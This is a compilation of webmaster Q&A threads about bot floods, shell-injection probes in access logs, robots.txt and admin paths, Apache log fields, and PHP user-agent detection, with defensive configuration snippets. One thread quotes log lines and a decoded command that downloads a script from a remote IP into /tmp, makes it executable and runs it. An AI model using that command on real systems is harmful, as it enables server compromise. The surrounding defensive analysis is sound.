Over the last few days I noticed that my WordPress website had been running quite slowly, so I decided to investigate. After checking my database I saw that a table responsible for tracking 404 errors was over 1GB in size. At this point it was evident I was being targeted by bots.
After checking my access log I could see a pattern of sorts: the bot lands on a legitimate page which lists my categories, then moves into a category page, and at that point it requests seemingly random page numbers, many of which are non-existent pages, which is what causes the issue.
Example:
/watch-online/ - Landing Page
/category/evolution/page/7 - 404
/category/evolution/page/1
/category/evolution/page/3
/category/evolution/page/5 - 404
/category/evolution/page/8 - 404
/category/evolution/page/4 - 404
/category/evolution/page/2
/category/evolution/page/6 - 404
/category/evolution/page/9 - 404
/category/evolution/page/10 - 404
This is the actual order of requests, and they all happen within a second. At this point the IP becomes blocked because too many 404s have been thrown, but this seems to have no effect due to the sheer number of bots all doing the same thing.
Also, the category changes with each bot, so they are all hitting random categories and generating 404 pages.
At the moment there are 2,037 unique IPs which have thrown similar 404s in the last 24 hours.
I also use Cloudflare and have manually blocked many IPs from ever reaching my box, but this attack is relentless and it seems as though they keep coming from new IPs. Here is a list of some offending IPs:
77.101.138.202
81.149.196.188
109.255.127.90
75.19.16.214
47.187.231.144
70.190.53.222
62.251.17.234
184.155.42.206
74.138.227.150
98.184.129.57
151.224.41.144
94.29.229.186
64.231.243.218
109.160.110.135
222.127.118.145
92.22.14.143
92.14.176.174
50.48.216.145
58.179.196.182
Other than automatically blocking IPs for too many 404 errors I can think of no other real solution, and this in itself is quite ineffective due to the sheer number of IPs.
Any suggestions on how to deal with this would be greatly appreciated, as there appears to be no end to this attack and my website's performance really is taking a hit.
Some User Agents Include:
Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Mozilla/5.0 (Windows NT 6.2; rv:26.0) Gecko/20100101 Firefox/26.0
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 7.0; WOW64; Trident/6.0)
Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:22.0) Gecko/20100101 Firefox/22.0
Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
If it's your personal website, you can try Cloudflare, which has a free plan and can also provide protection against DDoS attacks. Maybe you can give it a try.
Okay, so after much searching, experimentation and head-banging I have finally mitigated the attack.
The solution was to install the Apache module mod_evasive; see:
https://www.digitalocean.com/community/tutorials/how-to-protect-against-dos-and-ddos-with-mod_evasive-for-apache-on-centos-7
So for any other poor soul that gets slammed as severely as I did, have a look at that and get your thresholds finely tuned. This is a simple, cheap and very effective means of drastically blunting any attack similar to the one I suffered.
My server is still getting bombarded by bots but this really does limit their damage.
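For anyone tuning it themselves: the thresholds live in mod_evasive's config (on CentOS it's typically /etc/httpd/conf.d/mod_evasive.conf, and the module name in the IfModule line may be mod_evasive20.c or mod_evasive24.c depending on your build). A rough sketch of the kind of block I mean, with placeholder numbers you'd tune to your own traffic:
<IfModule mod_evasive24.c>
    # Max hits on the same page per page interval before an IP is flagged
    DOSPageCount        5
    DOSPageInterval     1
    # Max hits across the whole site per site interval
    DOSSiteCount        50
    DOSSiteInterval     1
    # How long (in seconds) an offending IP stays blocked
    DOSBlockingPeriod   60
    DOSLogDir           "/var/log/mod_evasive"
</IfModule>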
Related
I use WordPress on my site. Recently I blocked a hacker that infected my site with A LOT of backdoors (thousands of backdoors, literally). I spent one and a half months beating him. It wasn't my fault; the guy who had this job before me never updated the site.
After this, I noticed some strange accesses to files that just don't exist, and I think the hacker is trying to find known exploits in WordPress plugins that I don't use. That is OK, I don't care at all. But one of those tries caught my attention.
95.249.95.104 - - [17/Jan/2020:10:17:29 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
94.200.107.2 - - [17/Jan/2020:13:52:28 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
197.226.122.184 - - [17/Jan/2020:14:57:36 -0300] "karin***com.br" "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
I am hiding part of the URL, sorry.
The IPs always change, even between consecutive requests less than one second apart, so maybe it is a DDoS. The user agent commonly changes too; there is everything here: iPhone, iPad, Android, Windows 7, 8, 10, Firefox, Google Chrome, Internet Explorer... but not Linux or Mac. Those 3 requests are the only exception.
I noticed that there are some shell commands in the URL. These ones:
cd /tmp;
rm -rf .j;
wget http://91.92.66.124/..j/.j;
chmod 777 .j;
sh .j;
echo DONE
(the trailing HTTP/1.1 is just the protocol version from the request line, not part of the command)
There is no folder or file with this name in my /tmp directory.
This "karin" URL was an old site that hasn't existed for a long time. I don't know how he knows this URL; even I didn't know it. Every time I try to access some URL that is configured in NGINX but whose path doesn't exist, like this karin one, I get a 404 error. But those tries got a 400 error.
404 is normal; it just means there is nothing there. But 400? It suggests that something is there but couldn't process the data sent. I removed the nginx configuration for this URL and tried the same request against other URLs. I always got a 404 error. This is what I tried:
***.***.***.*** - - [17/Jan/2020:15:29:20 -0300] "joa***com.br" "GET /shell?cd+/var/www/html/conf;mkdir+teste HTTP/1.1" 404 555 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" "-"
So my question is: should I be scared of these commands returning a 400 error on this URL? Why can't I reproduce this? Apparently those tries failed, but can I be sure that they failed? What type of attack is this? I have never heard of a "shell script injection by URL" like this.
It is an automated scan made by scripts looking for web servers with bashdoor vulnerabilities.
You can, as a precaution, block all URLs that contain words like shell. This type of scan is common, and a web server firewall can easily handle preventing this kind of attack.
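Since you are on NGINX, one way to do this (a minimal sketch; adjust the pattern and its placement to your own setup) is a location block inside the relevant server { } section that rejects any URI containing "shell":
# Return 403 for any request whose URI contains "shell" (case-insensitive)
location ~* shell {
    return 403;
}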
This looks like a request from the Mozi Botnet, a botnet that searches for backdoor shells on IoT devices.
This may have been asked and answered before; I'm not sure of the best way to phrase this.
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
My admin directory is not called "admin" (the most common security-by-obscurity tactic)
Directory browsing is already blocked
Any IP that connects to my admin directory without first logging in with appropriate permissions is blacklisted. I have been monitoring, and only a couple of legitimate spiders have been blacklisted this way
I'm using .htaccess (merging several public blacklists) and PHP blacklisting based on behaviors (some automatic, but still Mark-I eyeball as well)
All actions on the admin side are auth-based
The only links to the admin side are presented to authorized users with the appropriate permissions.
I'm not sure if I should put the admin directory in robots.txt. On one hand, legit spiders will stay out of that directory, but on the other, I'm telling those who want to do harm that the directory exists, and I don't want prying eyes...
I want to ensure that search spiders don't index the admin side of my website. Unfortunately, if I put the path into my robots.txt file, I'm handing over the cookie jar. Thankfully it's locked, though.
You rightly recognize the conundrum. If you put the admin url in the robots.txt, then well-behaved bots will stay away. On the other hand, you are basically telegraphing to bad folks where the soft spots are.
If you inspect your web server's access log, you will most likely see a LOT of requests for admin-type pages. For instance, looking at the apache log on one of my servers, I see opportunistic script kiddies searching for wordpress, phpmyadmin, etc:
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpc.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:36 -0600] "GET /wpo.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:37 -0600] "GET /wp-config.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:43 -0600] "POST /wp-admins.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
109.98.109.101 - - [24/Jan/2019:08:50:01 -0600] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:48:39 -0600] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)"
109.98.109.101 - - [24/Jan/2019:08:49:35 -0600] "GET /phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
109.98.109.101 - - [24/Jan/2019:08:49:47 -0600] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
My access log has thousands upon thousands of these. Bots search for them all the time and none of these files are listed in my robots.txt file. As you might guess, unless you have an admin url that is really randomly named, the bad guys could very well guess its name is /admin.
I've already had quite a few "visitors" who start by grabbing robots.txt. Obviously, non-legit spiders will ignore robots.txt, but I want to prevent Google and Bing from plastering my admin directory in search results.
I'd strongly recommend spending some time banning bad bots, or basically any bots that you have no use for. AhrefsBot and SemrushBot come to mind. It shouldn't be too hard to find bad-bot lists, but you'll need to evaluate any list you find to make sure it isn't blocking bots you do want to serve. In addition to adding an exclusion rule to your robots.txt file, you should probably configure your application to ban bad bots by sending a 403 Forbidden, a 410 Gone, or another HTTP response code of your choice.
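As a rough illustration of that application-level ban (the bot names below are examples only; in practice you'd drive this from a maintained list):
<?php
// Minimal sketch: refuse requests from bots you have no use for.
$badBots = array('AhrefsBot', 'SemrushBot', 'MJ12bot', 'DotBot');
$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
foreach ($badBots as $bot) {
    if (stripos($ua, $bot) !== false) {
        http_response_code(403); // or 410 "Gone", if you prefer
        exit;
    }
}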
In the end, it's critical to remember the maxim that "security by obscurity is not security". One of the most important principles of encryption and security is Kerckhoffs's principle -- i.e., "the enemy knows the system." Your site should not just rely on the location of your admin urls being obscure or secret. You must require authentication and use sound best practices in your authentication code. I would not rely on Apache authentication but would instead code my web application to accept the user login/password in a securely hosted form (use HTTPS), and I would store only the hashed form of those passwords. Do not store cleartext passwords, ever.
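A minimal PHP sketch of that hashed-password approach (assuming the password arrives over HTTPS in a POST form; the variable names are just illustrative):
<?php
// Registration: store only the hash, never the cleartext password.
$hash = password_hash($_POST['password'], PASSWORD_DEFAULT);
// ...save $hash in your user table...

// Login: fetch the stored hash for that user, then verify.
$storedHash = $hash; // stand-in for the value fetched from your user table
if (password_verify($_POST['password'], $storedHash)) {
    // authenticated - start the session, etc.
} else {
    // reject the login attempt
}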
In the end, the security of your system is only as good as its weakest link. There is some value in having a unique or unusual admin url, because you might be exposed to fewer opportunistic attacks, but this in itself doesn't provide any real security. If you still have reservations about broadcasting this url in your robots.txt file, weigh that against the problems you might expect if GoogleBot or BingBot or some other friendly bot starts stomping around in your admin urls. Would it bother you if these urls ended up in the Google search index?
I have a website developed using PHP.
I encountered one major issue on my website: a security breach. So I checked the Apache access logs at /var/log/apache2/access.log on the server.
I found the following log entry, which caused the error, but I'm not able to understand what each part of this log means. Can someone please give me a step-by-step explanation of the log below?
70.39.61.42 - - [12/Jul/2015:17:05:12 +0000] "POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1" 302 398 "http://www.mywebsite.com/user/register/javascript.void(0)" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
This is the request which caused the major issue on my website, but I'm not able to figure out what parameters the request contained, what the response was, etc.
Thanks in advance.
70.39.61.42
This is the IP address of the client that sent the request to your server
[12/Jul/2015:17:05:12 +0000]
This is the date and time at which the request was made, with its timezone offset
"POST /user/register/javascript.void(0)/index.php?do=/user/register/ HTTP/1.1"
This is the request line: a POST request was sent to your server for the given URL, using HTTP/1.1
302 - This is the status code of the response - HTTP 302, a redirect
398 - This is the size, in bytes, of the response sent
"http://www.mywebsite.com/user/register/javascript.void(0)"
This is the referrer - the URL the request claims to have come from
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
This is the user agent of the visitor.
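For reference, these fields match Apache's standard "combined" log format, which (assuming a default Apache setup) is defined roughly like this:
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
Here %h is the client IP, %l and %u are the (usually empty, shown as "-") identd and authenticated-user fields, %t the timestamp, %r the request line, %>s the final status code, %b the response size in bytes, and the last two are the Referer and User-Agent headers.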
On my computer with Windows 8 and Google Chrome 35, the variable $_SERVER['HTTP_USER_AGENT'] sometimes returns
Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; Kindle Fire HD Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
when the correct value would be:
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Why does it happen and how can I prevent it?
Kindle is both a hardware e-reader and a piece of software to read e-books on computers, laptops and tablets. Could it be that you installed that on your machine and that it nested itself in Chrome, like a plug-in/add-on?
If you're sure no such thing is the case, consider the suggestion by Alok in the comments. If you don't know how to work with the console, check here whether the PHP-detected and JS-detected user agents read the same. If not, that would indeed be the cause.
Although I wouldn't know how to cure that then, other than by removing the (other) plug-ins/add-ons one by one.
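If it helps, a minimal check page along those lines (a sketch only; the file name is made up) could look like this:
<?php
// ua-check.php - compare the user agent PHP receives with the one
// the browser itself reports via JavaScript.
$serverUa = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '(none)';
?>
<!DOCTYPE html>
<html>
<body>
<p>PHP sees: <?php echo htmlspecialchars($serverUa, ENT_QUOTES, 'UTF-8'); ?></p>
<p>JS sees: <span id="js-ua"></span></p>
<script>
// If these two strings differ, something between the browser and PHP
// (an extension, proxy or security suite) is rewriting the header.
document.getElementById('js-ua').textContent = navigator.userAgent;
</script>
</body>
</html>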
When a search engine visits a webpage, what do the get_browser() function and $_SERVER['HTTP_USER_AGENT'] return?
Also, what other possible evidence does PHP offer that a search engine is crawling a webpage?
The get_browser() function attempts to determine the browser's capabilities (returned as an array or object), but don't count on it too much because of non-standard user agents; instead, for a serious app, build your own detection.
$_SERVER['HTTP_USER_AGENT'] is a long string "describing" the user's browser, and it can be passed as the first (optional) parameter to the function above. A tip: use this string to identify the user's browser instead of get_browser() itself! Also be prepared for a missing user agent! An example of this string is:
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3
A search engine robot (spider/crawler) that follows the rules will visit your pages according to the information stored in robots.txt, which should exist in your site's root.
Without a robots.txt a spider can crawl the whole site, as long as it finds links inside your pages; if you have this file, you can write it so as to tell the spider what to crawl and what to skip. NOTE: this only applies to "good" spiders, not the bad ones.
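If you just need to recognize the common crawlers from that user-agent string, a minimal sketch (the token list is illustrative, not exhaustive) could be:
<?php
// Detect common crawlers by substring match on the user agent.
function is_known_crawler($userAgent)
{
    $tokens = array('Googlebot', 'bingbot', 'msnbot', 'Slurp', 'DuckDuckBot');
    foreach ($tokens as $token) {
        if (stripos($userAgent, $token) !== false) {
            return true;
        }
    }
    return false;
}

$ua = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
if (is_known_crawler($ua)) {
    // e.g. skip analytics, or log the crawl separately
}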
get_browser() and $_SERVER['HTTP_USER_AGENT'] will give you the user agent; for search engines it should look like this:
Google :
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)
Googlebot-Image/1.0
Bing :
Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b
msnbot/2.0b (+http://search.msn.com/msnbot.htm)
msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)
Yahoo :
Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
-> To fully control (and limit) crawling, don't rely on robots.txt; use .htaccess or httpd.conf rules. (Good crawlers ignore your robots.txt disallow rules half of the time anyway.)
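For example, a minimal .htaccess sketch using Apache 2.4 syntax (the bot names are only examples; adjust them to the crawlers you actually want to keep out):
# Flag requests whose User-Agent matches crawlers you don't want to serve.
SetEnvIfNoCase User-Agent "AhrefsBot|SemrushBot|MJ12bot" unwanted_bot
# Allow everyone else, deny the flagged bots.
<RequireAll>
    Require all granted
    Require not env unwanted_bot
</RequireAll>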